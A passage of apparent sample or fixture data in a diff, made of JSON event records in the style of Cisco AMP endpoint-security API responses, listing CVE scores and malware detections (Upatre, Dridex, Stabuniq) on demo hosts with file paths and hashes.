ov/view/vuln/detail?vulnId=CVE-2013-2735"},{"cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"cve":"CVE-2013-0614","score":10,"url":"https://
web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263623","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":798000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263622","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":783000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263621","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":1664,"disposition":"Malicious","file_name":"Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":673000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263620","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":658000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263619","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331434977264000,"timestamp":1610704823,"timestamp_nanoseconds":627000000,"date":"2021-01-15T10:00:23+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331434977263618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207844921180000,"timestamp":1610704822,"timestamp_nanoseconds":699000000,"date":"2021-01-15T10:00:22+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207844921180170","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659264906658000,"timestamp":1610704820,"timestamp_nanoseconds":460000000,"date":"2021-01-15T10:00:20+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659264906657801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1490719361224000800,"timestamp":1610704819,"timestamp_nanoseconds":224000000,"date":"2021-01-15T10:00:19+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"Win.Trojan.Upatre.tht.VRT","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704819,"start_date":"2021-01-15T10:00:19+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331413502427000,"timestamp":1610704818,"timestamp_nanoseconds":57000000,"date":"2021-01-15T10:00:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331409207459841","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Fax.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614973673406000,"timestamp":1610704817,"timestamp_nanoseconds":734000000,"date":"2021-01-15T10:00:17+00:00","event_type":"Scan Completed, No 
Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1185,"scanned_processes":22,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207810561442000,"timestamp":1610704814,"timestamp_nanoseconds":961000000,"date":"2021-01-15T10:00:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207810561441801","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207806266474000,"timestamp":1610704813,"timestamp_nanoseconds":963000000,"date":"2021-01-15T10:00:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207806266474504","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.cab","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\4543543.cab","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207801971507000,"timestamp":1610704812,"timestamp_nanoseconds":777000000,"date":"2021-01-15T10:00:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207801971507207","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"},"parent":{"process_id":2348,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":179000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984840","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":2692,"disposition":"Malicious","file_name":"jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":148000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984839","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":117000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat 
